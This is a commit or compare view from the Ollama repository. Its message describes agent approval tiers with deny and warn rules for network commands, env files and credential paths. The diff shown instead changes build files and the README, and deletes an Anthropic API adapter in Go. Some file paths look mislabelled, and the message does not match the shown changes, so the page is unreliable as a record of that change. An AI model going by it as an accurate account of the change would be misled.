refactor(agent): implement three-tier approval system with warn patterns

- Remove git commands from auto-allowlist - Add new warn patterns tier for commands requiring explicit approval - Move network commands and env files from deny to warn - Add IsWarn() and containsWord() helper functions - Enhanced git prefix extraction for granular allowlisting - Move credential path patterns to denyPathPatterns - UI improvements: dynamic warning messages and allowlist info - Update tests: add TestIsWarn(), adjust expectations
2026-01-19 21:08:16 -05:00 · 2026-01-09 00:10:10 -08:00
152 changed files with 1781 additions and 29766 deletions
--- a/.github/ISSUE_TEMPLATE/10_bug_report.yml
+++ b/.github/ISSUE_TEMPLATE/10_bug_report.yml
@@ -13,7 +13,7 @@ body:
    id: logs
    attributes:
      label: Relevant log output
-      description: Please copy and paste any relevant log output. See [Troubleshooting Guide](https://github.com/ollama/ollama/blob/main/docs/troubleshooting.mdx#how-to-troubleshoot-issues) for details.
+      description: Please copy and paste any relevant log output. See [Troubleshooting Guide](https://github.com/ollama/ollama/blob/main/docs/troubleshooting.md#how-to-troubleshoot-issues) for details.
      render: shell
    validations:
      required: false
--- a/.github/workflows/release.yaml
+++ b/.github/workflows/release.yaml
@@ -372,17 +372,13 @@ jobs:
          outputs: type=local,dest=dist/${{ matrix.os }}-${{ matrix.arch }}
          cache-from: type=registry,ref=${{ vars.DOCKER_REPO }}:latest
          cache-to: type=inline
-      - name: Deduplicate CUDA libraries
-        run: |
-          ./scripts/deduplicate_cuda_libs.sh dist/${{ matrix.os }}-${{ matrix.arch }}
      - run: |
          for COMPONENT in bin/* lib/ollama/*; do
            case "$COMPONENT" in
-              bin/ollama*)               echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
+              bin/ollama)                echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
              lib/ollama/*.so*)          echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
              lib/ollama/cuda_v*)        echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
              lib/ollama/vulkan*)        echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
-              lib/ollama/mlx*)           echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
              lib/ollama/cuda_jetpack5)  echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}-jetpack5.tar.in ;;
              lib/ollama/cuda_jetpack6)  echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}-jetpack6.tar.in ;;
              lib/ollama/rocm)           echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}-rocm.tar.in ;;
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -48,10 +48,9 @@ if((CMAKE_OSX_ARCHITECTURES AND NOT CMAKE_OSX_ARCHITECTURES MATCHES "arm64")
    set(GGML_CPU_ALL_VARIANTS ON)
 endif()

-if(APPLE)
+if (CMAKE_OSX_ARCHITECTURES MATCHES "x86_64")
    set(CMAKE_BUILD_RPATH "@loader_path")
    set(CMAKE_INSTALL_RPATH "@loader_path")
-    set(CMAKE_BUILD_WITH_INSTALL_RPATH ON)
 endif()

 set(OLLAMA_BUILD_DIR ${CMAKE_BINARY_DIR}/lib/ollama)
@@ -190,21 +189,13 @@ if(MLX_ENGINE)
    install(TARGETS mlx mlxc
        RUNTIME_DEPENDENCIES
            DIRECTORIES ${CUDAToolkit_BIN_DIR} ${CUDAToolkit_BIN_DIR}/x64 ${CUDAToolkit_LIBRARY_DIR}
-            PRE_INCLUDE_REGEXES cublas cublasLt cudart nvrtc nvrtc-builtins cudnn nccl openblas gfortran
+            PRE_INCLUDE_REGEXES cublas cublasLt cudart nvrtc cudnn nccl
            PRE_EXCLUDE_REGEXES ".*"
        RUNTIME DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
        LIBRARY DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
        FRAMEWORK DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
    )

-    # Install the Metal library for macOS arm64 (must be colocated with the binary)
-    # Metal backend is only built for arm64, not x86_64
-    if(APPLE AND CMAKE_SYSTEM_PROCESSOR STREQUAL "arm64")
-        install(FILES ${CMAKE_BINARY_DIR}/_deps/mlx-build/mlx/backend/metal/kernels/mlx.metallib
-            DESTINATION ${OLLAMA_INSTALL_DIR}
-            COMPONENT MLX)
-    endif()
-
    # Manually install cudart and cublas since they might not be picked up as direct dependencies
    if(CUDAToolkit_FOUND)
        file(GLOB CUDART_LIBS
--- a/21
+++ b/21
@@ -32,7 +32,7 @@ ENV PATH=/${VULKANVERSION}/x86_64/bin:$PATH
 FROM --platform=linux/arm64 almalinux:8 AS base-arm64
 # install epel-release for ccache
 RUN yum install -y yum-utils epel-release \
-    && dnf install -y clang ccache git \
+    && dnf install -y clang ccache \
    && yum-config-manager --add-repo https://developer.download.nvidia.com/compute/cuda/repos/rhel8/sbsa/cuda-rhel8.repo
 ENV CC=clang CXX=clang++

@@ -149,7 +149,6 @@ COPY CMakeLists.txt CMakePresets.json .
 COPY ml/backend/ggml/ggml ml/backend/ggml/ggml
 COPY x/ml/backend/mlx x/ml/backend/mlx
 COPY go.mod go.sum .
-COPY MLX_VERSION .
 RUN curl -fsSL https://golang.org/dl/go$(awk '/^go/ { print $2 }' go.mod).linux-$(case $(uname -m) in x86_64) echo amd64 ;; aarch64) echo arm64 ;; esac).tar.gz | tar xz -C /usr/local
 ENV PATH=/usr/local/go/bin:$PATH
 RUN go mod download
@@ -157,6 +156,15 @@ RUN --mount=type=cache,target=/root/.ccache \
    cmake --preset 'MLX CUDA 13' -DBLAS_INCLUDE_DIRS=/usr/include/openblas -DLAPACK_INCLUDE_DIRS=/usr/include/openblas \
        && cmake --build --parallel ${PARALLEL} --preset 'MLX CUDA 13' \
        && cmake --install build --component MLX --strip --parallel ${PARALLEL}
+COPY . .
+ARG GOFLAGS="'-ldflags=-w -s'"
+ENV CGO_ENABLED=1
+ARG CGO_CFLAGS
+ARG CGO_CXXFLAGS
+# TODO wire up the actual MLX engine here instead of building the main binary...
+RUN mkdir -p dist/bin
+RUN go build -tags mlx -trimpath -buildmode=pie -o dist/bin/imagegen ./x/imagegen/cmd/engine
+

 FROM base AS build
 WORKDIR /go/src/github.com/ollama/ollama
@@ -165,14 +173,12 @@ RUN curl -fsSL https://golang.org/dl/go$(awk '/^go/ { print $2 }' go.mod).linux-
 ENV PATH=/usr/local/go/bin:$PATH
 RUN go mod download
 COPY . .
-# Clone mlx-c headers for CGO (version from MLX_VERSION file)
-RUN git clone --depth 1 --branch "$(cat MLX_VERSION)" https://github.com/ml-explore/mlx-c.git build/_deps/mlx-c-src
 ARG GOFLAGS="'-ldflags=-w -s'"
 ENV CGO_ENABLED=1
-ENV CGO_CFLAGS="-I/go/src/github.com/ollama/ollama/build/_deps/mlx-c-src"
+ARG CGO_CFLAGS
 ARG CGO_CXXFLAGS
 RUN --mount=type=cache,target=/root/.cache/go-build \
-    go build -tags mlx -trimpath -buildmode=pie -o /bin/ollama .
+    go build -trimpath -buildmode=pie -o /bin/ollama .

 FROM --platform=linux/amd64 scratch AS amd64
 # COPY --from=cuda-11 dist/lib/ollama/ /lib/ollama/
@@ -180,6 +186,7 @@ COPY --from=cuda-12 dist/lib/ollama /lib/ollama/
 COPY --from=cuda-13 dist/lib/ollama /lib/ollama/
 COPY --from=vulkan  dist/lib/ollama  /lib/ollama/
 COPY --from=mlx     /go/src/github.com/ollama/ollama/dist/lib/ollama /lib/ollama/
+COPY --from=mlx     /go/src/github.com/ollama/ollama/dist/bin/ /bin/

 FROM --platform=linux/arm64 scratch AS arm64
 # COPY --from=cuda-11 dist/lib/ollama/ /lib/ollama/
@@ -198,7 +205,7 @@ COPY --from=build /bin/ollama /bin/ollama

 FROM ubuntu:24.04
 RUN apt-get update \
-    && apt-get install -y ca-certificates libvulkan1 libopenblas0 \
+    && apt-get install -y ca-certificates libvulkan1 \
    && apt-get clean \
    && rm -rf /var/lib/apt/lists/*
 COPY --from=archive /bin /usr/bin
--- a/1
+++ b/1
@@ -1 +0,0 @@
-v0.4.1
--- a/README.md
+++ b/README.md
@@ -48,7 +48,7 @@ ollama run gemma3

 ## Model library

-Ollama supports a list of models available on [ollama.com/library](https://ollama.com/library "ollama model library")
+Ollama supports a list of models available on [ollama.com/library](https://ollama.com/library 'ollama model library')

 Here are some example models that can be downloaded:

@@ -79,7 +79,7 @@ Here are some example models that can be downloaded:
 | Code Llama         | 7B         | 3.8GB | `ollama run codellama`           |
 | Llama 2 Uncensored | 7B         | 3.8GB | `ollama run llama2-uncensored`   |
 | LLaVA              | 7B         | 4.5GB | `ollama run llava`               |
-| Granite-3.3        | 8B         | 4.9GB | `ollama run granite3.3`          |
+| Granite-3.3         | 8B         | 4.9GB | `ollama run granite3.3`          |

 > [!NOTE]
 > You should have at least 8 GB of RAM available to run the 7B models, 16 GB to run the 13B models, and 32 GB to run the 33B models.
@@ -260,38 +260,6 @@ Finally, in a separate shell, run a model:
 ./ollama run llama3.2
 ```

-## Building with MLX (experimental)
-
-First build the MLX libraries:
-
-```shell
-cmake --preset MLX
-cmake --build --preset MLX --parallel
-cmake --install build --component MLX
-```
-
-When building with the `-tags mlx` flag, the main `ollama` binary includes MLX support for experimental features like image generation:
-
-```shell
-go build -tags mlx .
-```
-
-Finally, start the server:
-
-```
-./ollama serve
-```
-
-### Building MLX with CUDA
-
-When building with CUDA, use the preset "MLX CUDA 13" or "MLX CUDA 12" to enable CUDA with default architectures:
-
-```shell
-cmake --preset 'MLX CUDA 13'
-cmake --build --preset 'MLX CUDA 13' --parallel
-cmake --install build --component MLX
-```
-
 ## REST API

 Ollama has a REST API for running and managing models.
@@ -322,7 +290,6 @@ See the [API documentation](./docs/api.md) for all endpoints.

 ### Web & Desktop

- [Onyx](https://github.com/onyx-dot-app/onyx)
 - [Open WebUI](https://github.com/open-webui/open-webui)
 - [SwiftChat (macOS with ReactNative)](https://github.com/aws-samples/swift-chat)
 - [Enchanted (macOS native)](https://github.com/AugustDev/enchanted)
@@ -454,7 +421,7 @@ See the [API documentation](./docs/api.md) for all endpoints.
 - [AppFlowy](https://github.com/AppFlowy-IO/AppFlowy) (AI collaborative workspace with Ollama, cross-platform and self-hostable)
 - [Lumina](https://github.com/cushydigit/lumina.git) (A lightweight, minimal React.js frontend for interacting with Ollama servers)
 - [Tiny Notepad](https://pypi.org/project/tiny-notepad) (A lightweight, notepad-like interface to chat with ollama available on PyPI)
- [macLlama (macOS native)](https://github.com/hellotunamayo/macLlama) (A native macOS GUI application for interacting with Ollama models, featuring a chat interface.)
+- [macLlama (macOS native)](https://github.com/hellotunamayo/macLlama) (A native macOS GUI application for interacting with Ollama models, featuring a chat interface.) 
 - [GPTranslate](https://github.com/philberndt/GPTranslate) (A fast and lightweight, AI powered desktop translation application written with Rust and Tauri. Features real-time translation with OpenAI/Azure/Ollama.)
 - [ollama launcher](https://github.com/NGC13009/ollama-launcher) (A launcher for Ollama, aiming to provide users with convenient functions such as ollama server launching, management, or configuration.)
 - [ai-hub](https://github.com/Aj-Seven/ai-hub) (AI Hub supports multiple models via API keys and Chat support via Ollama API.)
@@ -526,7 +493,7 @@ See the [API documentation](./docs/api.md) for all endpoints.
 ### Database

 - [pgai](https://github.com/timescale/pgai) - PostgreSQL as a vector database (Create and search embeddings from Ollama models using pgvector)
-  - [Get started guide](https://github.com/timescale/pgai/blob/main/docs/vectorizer-quick-start.md)
+   - [Get started guide](https://github.com/timescale/pgai/blob/main/docs/vectorizer-quick-start.md)
 - [MindsDB](https://github.com/mindsdb/mindsdb/blob/staging/mindsdb/integrations/handlers/ollama_handler/README.md) (Connects Ollama models with nearly 200 data platforms and apps)
 - [chromem-go](https://github.com/philippgille/chromem-go/blob/v0.5.0/embed_ollama.go) with [example](https://github.com/philippgille/chromem-go/tree/v0.5.0/examples/rag-wikipedia-ollama)
 - [Kangaroo](https://github.com/dbkangaroo/kangaroo) (AI-powered SQL client and admin tool for popular databases)
@@ -669,7 +636,6 @@ See the [API documentation](./docs/api.md) for all endpoints.
 - [llama.cpp](https://github.com/ggml-org/llama.cpp) project founded by Georgi Gerganov.

 ### Observability
-
 - [Opik](https://www.comet.com/docs/opik/cookbook/ollama) is an open-source platform to debug, evaluate, and monitor your LLM applications, RAG systems, and agentic workflows with comprehensive tracing, automated evaluations, and production-ready dashboards. Opik supports native integration to Ollama.
 - [Lunary](https://lunary.ai/docs/integrations/ollama) is the leading open-source LLM observability platform. It provides a variety of enterprise-grade features such as real-time analytics, prompt templates management, PII masking, and comprehensive agent tracing.
 - [OpenLIT](https://github.com/openlit/openlit) is an OpenTelemetry-native tool for monitoring Ollama Applications & GPUs using traces and metrics.
@@ -678,5 +644,4 @@ See the [API documentation](./docs/api.md) for all endpoints.
 - [MLflow Tracing](https://mlflow.org/docs/latest/llms/tracing/index.html#automatic-tracing) is an open source LLM observability tool with a convenient API to log and visualize traces, making it easy to debug and evaluate GenAI applications.

 ### Security
-
 - [Ollama Fortress](https://github.com/ParisNeo/ollama_proxy_server)
--- a/anthropic/anthropic.go
+++ b/anthropic/anthropic.go
@@ -1,778 +0,0 @@
-package anthropic
-
-import (
-	"crypto/rand"
-	"encoding/base64"
-	"encoding/json"
-	"errors"
-	"fmt"
-	"log/slog"
-	"net/http"
-	"strings"
-	"time"
-
-	"github.com/ollama/ollama/api"
-)
-
-// Error types matching Anthropic API
-type Error struct {
-	Type    string `json:"type"`
-	Message string `json:"message"`
-}
-
-type ErrorResponse struct {
-	Type      string `json:"type"` // always "error"
-	Error     Error  `json:"error"`
-	RequestID string `json:"request_id,omitempty"`
-}
-
-// NewError creates a new ErrorResponse with the appropriate error type based on HTTP status code
-func NewError(code int, message string) ErrorResponse {
-	var etype string
-	switch code {
-	case http.StatusBadRequest:
-		etype = "invalid_request_error"
-	case http.StatusUnauthorized:
-		etype = "authentication_error"
-	case http.StatusForbidden:
-		etype = "permission_error"
-	case http.StatusNotFound:
-		etype = "not_found_error"
-	case http.StatusTooManyRequests:
-		etype = "rate_limit_error"
-	case http.StatusServiceUnavailable, 529:
-		etype = "overloaded_error"
-	default:
-		etype = "api_error"
-	}
-
-	return ErrorResponse{
-		Type:      "error",
-		Error:     Error{Type: etype, Message: message},
-		RequestID: generateID("req"),
-	}
-}
-
-// Request types
-
-// MessagesRequest represents an Anthropic Messages API request
-type MessagesRequest struct {
-	Model         string          `json:"model"`
-	MaxTokens     int             `json:"max_tokens"`
-	Messages      []MessageParam  `json:"messages"`
-	System        any             `json:"system,omitempty"` // string or []ContentBlock
-	Stream        bool            `json:"stream,omitempty"`
-	Temperature   *float64        `json:"temperature,omitempty"`
-	TopP          *float64        `json:"top_p,omitempty"`
-	TopK          *int            `json:"top_k,omitempty"`
-	StopSequences []string        `json:"stop_sequences,omitempty"`
-	Tools         []Tool          `json:"tools,omitempty"`
-	ToolChoice    *ToolChoice     `json:"tool_choice,omitempty"`
-	Thinking      *ThinkingConfig `json:"thinking,omitempty"`
-	Metadata      *Metadata       `json:"metadata,omitempty"`
-}
-
-// MessageParam represents a message in the request
-type MessageParam struct {
-	Role    string `json:"role"`    // "user" or "assistant"
-	Content any    `json:"content"` // string or []ContentBlock
-}
-
-// ContentBlock represents a content block in a message.
-// Text and Thinking use pointers so they serialize as the field being present (even if empty)
-// only when set, which is required for SDK streaming accumulation.
-type ContentBlock struct {
-	Type string `json:"type"` // text, image, tool_use, tool_result, thinking
-
-	// For text blocks - pointer so field only appears when set (SDK requires it for accumulation)
-	Text *string `json:"text,omitempty"`
-
-	// For image blocks
-	Source *ImageSource `json:"source,omitempty"`
-
-	// For tool_use blocks
-	ID    string `json:"id,omitempty"`
-	Name  string `json:"name,omitempty"`
-	Input any    `json:"input,omitempty"`
-
-	// For tool_result blocks
-	ToolUseID string `json:"tool_use_id,omitempty"`
-	Content   any    `json:"content,omitempty"` // string or []ContentBlock
-	IsError   bool   `json:"is_error,omitempty"`
-
-	// For thinking blocks - pointer so field only appears when set (SDK requires it for accumulation)
-	Thinking  *string `json:"thinking,omitempty"`
-	Signature string  `json:"signature,omitempty"`
-}
-
-// ImageSource represents the source of an image
-type ImageSource struct {
-	Type      string `json:"type"` // "base64" or "url"
-	MediaType string `json:"media_type,omitempty"`
-	Data      string `json:"data,omitempty"`
-	URL       string `json:"url,omitempty"`
-}
-
-// Tool represents a tool definition
-type Tool struct {
-	Type        string          `json:"type,omitempty"` // "custom" for user-defined tools
-	Name        string          `json:"name"`
-	Description string          `json:"description,omitempty"`
-	InputSchema json.RawMessage `json:"input_schema,omitempty"`
-}
-
-// ToolChoice controls how the model uses tools
-type ToolChoice struct {
-	Type                   string `json:"type"` // "auto", "any", "tool", "none"
-	Name                   string `json:"name,omitempty"`
-	DisableParallelToolUse bool   `json:"disable_parallel_tool_use,omitempty"`
-}
-
-// ThinkingConfig controls extended thinking
-type ThinkingConfig struct {
-	Type         string `json:"type"` // "enabled" or "disabled"
-	BudgetTokens int    `json:"budget_tokens,omitempty"`
-}
-
-// Metadata for the request
-type Metadata struct {
-	UserID string `json:"user_id,omitempty"`
-}
-
-// Response types
-
-// MessagesResponse represents an Anthropic Messages API response
-type MessagesResponse struct {
-	ID           string         `json:"id"`
-	Type         string         `json:"type"` // "message"
-	Role         string         `json:"role"` // "assistant"
-	Model        string         `json:"model"`
-	Content      []ContentBlock `json:"content"`
-	StopReason   string         `json:"stop_reason,omitempty"`
-	StopSequence string         `json:"stop_sequence,omitempty"`
-	Usage        Usage          `json:"usage"`
-}
-
-// Usage contains token usage information
-type Usage struct {
-	InputTokens  int `json:"input_tokens"`
-	OutputTokens int `json:"output_tokens"`
-}
-
-// Streaming event types
-
-// MessageStartEvent is sent at the start of streaming
-type MessageStartEvent struct {
-	Type    string           `json:"type"` // "message_start"
-	Message MessagesResponse `json:"message"`
-}
-
-// ContentBlockStartEvent signals the start of a content block
-type ContentBlockStartEvent struct {
-	Type         string       `json:"type"` // "content_block_start"
-	Index        int          `json:"index"`
-	ContentBlock ContentBlock `json:"content_block"`
-}
-
-// ContentBlockDeltaEvent contains incremental content updates
-type ContentBlockDeltaEvent struct {
-	Type  string `json:"type"` // "content_block_delta"
-	Index int    `json:"index"`
-	Delta Delta  `json:"delta"`
-}
-
-// Delta represents an incremental update
-type Delta struct {
-	Type        string `json:"type"` // "text_delta", "input_json_delta", "thinking_delta", "signature_delta"
-	Text        string `json:"text,omitempty"`
-	PartialJSON string `json:"partial_json,omitempty"`
-	Thinking    string `json:"thinking,omitempty"`
-	Signature   string `json:"signature,omitempty"`
-}
-
-// ContentBlockStopEvent signals the end of a content block
-type ContentBlockStopEvent struct {
-	Type  string `json:"type"` // "content_block_stop"
-	Index int    `json:"index"`
-}
-
-// MessageDeltaEvent contains updates to the message
-type MessageDeltaEvent struct {
-	Type  string       `json:"type"` // "message_delta"
-	Delta MessageDelta `json:"delta"`
-	Usage DeltaUsage   `json:"usage"`
-}
-
-// MessageDelta contains stop information
-type MessageDelta struct {
-	StopReason   string `json:"stop_reason,omitempty"`
-	StopSequence string `json:"stop_sequence,omitempty"`
-}
-
-// DeltaUsage contains cumulative token usage
-type DeltaUsage struct {
-	OutputTokens int `json:"output_tokens"`
-}
-
-// MessageStopEvent signals the end of the message
-type MessageStopEvent struct {
-	Type string `json:"type"` // "message_stop"
-}
-
-// PingEvent is a keepalive event
-type PingEvent struct {
-	Type string `json:"type"` // "ping"
-}
-
-// StreamErrorEvent is an error during streaming
-type StreamErrorEvent struct {
-	Type  string `json:"type"` // "error"
-	Error Error  `json:"error"`
-}
-
-// FromMessagesRequest converts an Anthropic MessagesRequest to an Ollama api.ChatRequest
-func FromMessagesRequest(r MessagesRequest) (*api.ChatRequest, error) {
-	var messages []api.Message
-
-	if r.System != nil {
-		switch sys := r.System.(type) {
-		case string:
-			if sys != "" {
-				messages = append(messages, api.Message{Role: "system", Content: sys})
-			}
-		case []any:
-			// System can be an array of content blocks
-			var content strings.Builder
-			for _, block := range sys {
-				if blockMap, ok := block.(map[string]any); ok {
-					if blockMap["type"] == "text" {
-						if text, ok := blockMap["text"].(string); ok {
-							content.WriteString(text)
-						}
-					}
-				}
-			}
-			if content.Len() > 0 {
-				messages = append(messages, api.Message{Role: "system", Content: content.String()})
-			}
-		}
-	}
-
-	for _, msg := range r.Messages {
-		converted, err := convertMessage(msg)
-		if err != nil {
-			return nil, err
-		}
-		messages = append(messages, converted...)
-	}
-
-	options := make(map[string]any)
-
-	options["num_predict"] = r.MaxTokens
-
-	if r.Temperature != nil {
-		options["temperature"] = *r.Temperature
-	}
-
-	if r.TopP != nil {
-		options["top_p"] = *r.TopP
-	}
-
-	if r.TopK != nil {
-		options["top_k"] = *r.TopK
-	}
-
-	if len(r.StopSequences) > 0 {
-		options["stop"] = r.StopSequences
-	}
-
-	var tools api.Tools
-	for _, t := range r.Tools {
-		tool, err := convertTool(t)
-		if err != nil {
-			return nil, err
-		}
-		tools = append(tools, tool)
-	}
-
-	var think *api.ThinkValue
-	if r.Thinking != nil && r.Thinking.Type == "enabled" {
-		think = &api.ThinkValue{Value: true}
-	}
-
-	stream := r.Stream
-
-	return &api.ChatRequest{
-		Model:    r.Model,
-		Messages: messages,
-		Options:  options,
-		Stream:   &stream,
-		Tools:    tools,
-		Think:    think,
-	}, nil
-}
-
-// convertMessage converts an Anthropic MessageParam to Ollama api.Message(s)
-func convertMessage(msg MessageParam) ([]api.Message, error) {
-	var messages []api.Message
-	role := strings.ToLower(msg.Role)
-
-	switch content := msg.Content.(type) {
-	case string:
-		messages = append(messages, api.Message{Role: role, Content: content})
-
-	case []any:
-		var textContent strings.Builder
-		var images []api.ImageData
-		var toolCalls []api.ToolCall
-		var thinking string
-		var toolResults []api.Message
-
-		for _, block := range content {
-			blockMap, ok := block.(map[string]any)
-			if !ok {
-				return nil, errors.New("invalid content block format")
-			}
-
-			blockType, _ := blockMap["type"].(string)
-
-			switch blockType {
-			case "text":
-				if text, ok := blockMap["text"].(string); ok {
-					textContent.WriteString(text)
-				}
-
-			case "image":
-				source, ok := blockMap["source"].(map[string]any)
-				if !ok {
-					return nil, errors.New("invalid image source")
-				}
-
-				sourceType, _ := source["type"].(string)
-				if sourceType == "base64" {
-					data, _ := source["data"].(string)
-					decoded, err := base64.StdEncoding.DecodeString(data)
-					if err != nil {
-						return nil, fmt.Errorf("invalid base64 image data: %w", err)
-					}
-					images = append(images, decoded)
-				} else {
-					return nil, fmt.Errorf("invalid image source type: %s. Only base64 images are supported.", sourceType)
-				}
-				// URL images would need to be fetched - skip for now
-
-			case "tool_use":
-				id, ok := blockMap["id"].(string)
-				if !ok {
-					return nil, errors.New("tool_use block missing required 'id' field")
-				}
-				name, ok := blockMap["name"].(string)
-				if !ok {
-					return nil, errors.New("tool_use block missing required 'name' field")
-				}
-				tc := api.ToolCall{
-					ID: id,
-					Function: api.ToolCallFunction{
-						Name: name,
-					},
-				}
-				if input, ok := blockMap["input"].(map[string]any); ok {
-					tc.Function.Arguments = mapToArgs(input)
-				}
-				toolCalls = append(toolCalls, tc)
-
-			case "tool_result":
-				toolUseID, _ := blockMap["tool_use_id"].(string)
-				var resultContent string
-
-				switch c := blockMap["content"].(type) {
-				case string:
-					resultContent = c
-				case []any:
-					for _, cb := range c {
-						if cbMap, ok := cb.(map[string]any); ok {
-							if cbMap["type"] == "text" {
-								if text, ok := cbMap["text"].(string); ok {
-									resultContent += text
-								}
-							}
-						}
-					}
-				}
-
-				toolResults = append(toolResults, api.Message{
-					Role:       "tool",
-					Content:    resultContent,
-					ToolCallID: toolUseID,
-				})
-
-			case "thinking":
-				if t, ok := blockMap["thinking"].(string); ok {
-					thinking = t
-				}
-			}
-		}
-
-		if textContent.Len() > 0 || len(images) > 0 || len(toolCalls) > 0 || thinking != "" {
-			m := api.Message{
-				Role:      role,
-				Content:   textContent.String(),
-				Images:    images,
-				ToolCalls: toolCalls,
-				Thinking:  thinking,
-			}
-			messages = append(messages, m)
-		}
-
-		// Add tool results as separate messages
-		messages = append(messages, toolResults...)
-
-	default:
-		return nil, fmt.Errorf("invalid message content type: %T", content)
-	}
-
-	return messages, nil
-}
-
-// convertTool converts an Anthropic Tool to an Ollama api.Tool
-func convertTool(t Tool) (api.Tool, error) {
-	var params api.ToolFunctionParameters
-	if len(t.InputSchema) > 0 {
-		if err := json.Unmarshal(t.InputSchema, &params); err != nil {
-			return api.Tool{}, fmt.Errorf("invalid input_schema for tool %q: %w", t.Name, err)
-		}
-	}
-
-	return api.Tool{
-		Type: "function",
-		Function: api.ToolFunction{
-			Name:        t.Name,
-			Description: t.Description,
-			Parameters:  params,
-		},
-	}, nil
-}
-
-// ToMessagesResponse converts an Ollama api.ChatResponse to an Anthropic MessagesResponse
-func ToMessagesResponse(id string, r api.ChatResponse) MessagesResponse {
-	var content []ContentBlock
-
-	if r.Message.Thinking != "" {
-		content = append(content, ContentBlock{
-			Type:     "thinking",
-			Thinking: ptr(r.Message.Thinking),
-		})
-	}
-
-	if r.Message.Content != "" {
-		content = append(content, ContentBlock{
-			Type: "text",
-			Text: ptr(r.Message.Content),
-		})
-	}
-
-	for _, tc := range r.Message.ToolCalls {
-		content = append(content, ContentBlock{
-			Type:  "tool_use",
-			ID:    tc.ID,
-			Name:  tc.Function.Name,
-			Input: tc.Function.Arguments,
-		})
-	}
-
-	stopReason := mapStopReason(r.DoneReason, len(r.Message.ToolCalls) > 0)
-
-	return MessagesResponse{
-		ID:         id,
-		Type:       "message",
-		Role:       "assistant",
-		Model:      r.Model,
-		Content:    content,
-		StopReason: stopReason,
-		Usage: Usage{
-			InputTokens:  r.Metrics.PromptEvalCount,
-			OutputTokens: r.Metrics.EvalCount,
-		},
-	}
-}
-
-// mapStopReason converts Ollama done_reason to Anthropic stop_reason
-func mapStopReason(reason string, hasToolCalls bool) string {
-	if hasToolCalls {
-		return "tool_use"
-	}
-
-	switch reason {
-	case "stop":
-		return "end_turn"
-	case "length":
-		return "max_tokens"
-	default:
-		if reason != "" {
-			return "stop_sequence"
-		}
-		return ""
-	}
-}
-
-// StreamConverter manages state for converting Ollama streaming responses to Anthropic format
-type StreamConverter struct {
-	ID              string
-	Model           string
-	firstWrite      bool
-	contentIndex    int
-	inputTokens     int
-	outputTokens    int
-	thinkingStarted bool
-	thinkingDone    bool
-	textStarted     bool
-	toolCallsSent   map[string]bool
-}
-
-func NewStreamConverter(id, model string) *StreamConverter {
-	return &StreamConverter{
-		ID:            id,
-		Model:         model,
-		firstWrite:    true,
-		toolCallsSent: make(map[string]bool),
-	}
-}
-
-// StreamEvent represents a streaming event to be sent to the client
-type StreamEvent struct {
-	Event string
-	Data  any
-}
-
-// Process converts an Ollama ChatResponse to Anthropic streaming events
-func (c *StreamConverter) Process(r api.ChatResponse) []StreamEvent {
-	var events []StreamEvent
-
-	if c.firstWrite {
-		c.firstWrite = false
-		c.inputTokens = r.Metrics.PromptEvalCount
-
-		events = append(events, StreamEvent{
-			Event: "message_start",
-			Data: MessageStartEvent{
-				Type: "message_start",
-				Message: MessagesResponse{
-					ID:      c.ID,
-					Type:    "message",
-					Role:    "assistant",
-					Model:   c.Model,
-					Content: []ContentBlock{},
-					Usage: Usage{
-						InputTokens:  c.inputTokens,
-						OutputTokens: 0,
-					},
-				},
-			},
-		})
-	}
-
-	if r.Message.Thinking != "" && !c.thinkingDone {
-		if !c.thinkingStarted {
-			c.thinkingStarted = true
-			events = append(events, StreamEvent{
-				Event: "content_block_start",
-				Data: ContentBlockStartEvent{
-					Type:  "content_block_start",
-					Index: c.contentIndex,
-					ContentBlock: ContentBlock{
-						Type:     "thinking",
-						Thinking: ptr(""),
-					},
-				},
-			})
-		}
-
-		events = append(events, StreamEvent{
-			Event: "content_block_delta",
-			Data: ContentBlockDeltaEvent{
-				Type:  "content_block_delta",
-				Index: c.contentIndex,
-				Delta: Delta{
-					Type:     "thinking_delta",
-					Thinking: r.Message.Thinking,
-				},
-			},
-		})
-	}
-
-	if r.Message.Content != "" {
-		if c.thinkingStarted && !c.thinkingDone {
-			c.thinkingDone = true
-			events = append(events, StreamEvent{
-				Event: "content_block_stop",
-				Data: ContentBlockStopEvent{
-					Type:  "content_block_stop",
-					Index: c.contentIndex,
-				},
-			})
-			c.contentIndex++
-		}
-
-		if !c.textStarted {
-			c.textStarted = true
-			events = append(events, StreamEvent{
-				Event: "content_block_start",
-				Data: ContentBlockStartEvent{
-					Type:  "content_block_start",
-					Index: c.contentIndex,
-					ContentBlock: ContentBlock{
-						Type: "text",
-						Text: ptr(""),
-					},
-				},
-			})
-		}
-
-		events = append(events, StreamEvent{
-			Event: "content_block_delta",
-			Data: ContentBlockDeltaEvent{
-				Type:  "content_block_delta",
-				Index: c.contentIndex,
-				Delta: Delta{
-					Type: "text_delta",
-					Text: r.Message.Content,
-				},
-			},
-		})
-	}
-
-	for _, tc := range r.Message.ToolCalls {
-		if c.toolCallsSent[tc.ID] {
-			continue
-		}
-
-		if c.textStarted {
-			events = append(events, StreamEvent{
-				Event: "content_block_stop",
-				Data: ContentBlockStopEvent{
-					Type:  "content_block_stop",
-					Index: c.contentIndex,
-				},
-			})
-			c.contentIndex++
-			c.textStarted = false
-		}
-
-		argsJSON, err := json.Marshal(tc.Function.Arguments)
-		if err != nil {
-			slog.Error("failed to marshal tool arguments", "error", err, "tool_id", tc.ID)
-			continue
-		}
-
-		events = append(events, StreamEvent{
-			Event: "content_block_start",
-			Data: ContentBlockStartEvent{
-				Type:  "content_block_start",
-				Index: c.contentIndex,
-				ContentBlock: ContentBlock{
-					Type:  "tool_use",
-					ID:    tc.ID,
-					Name:  tc.Function.Name,
-					Input: map[string]any{},
-				},
-			},
-		})
-
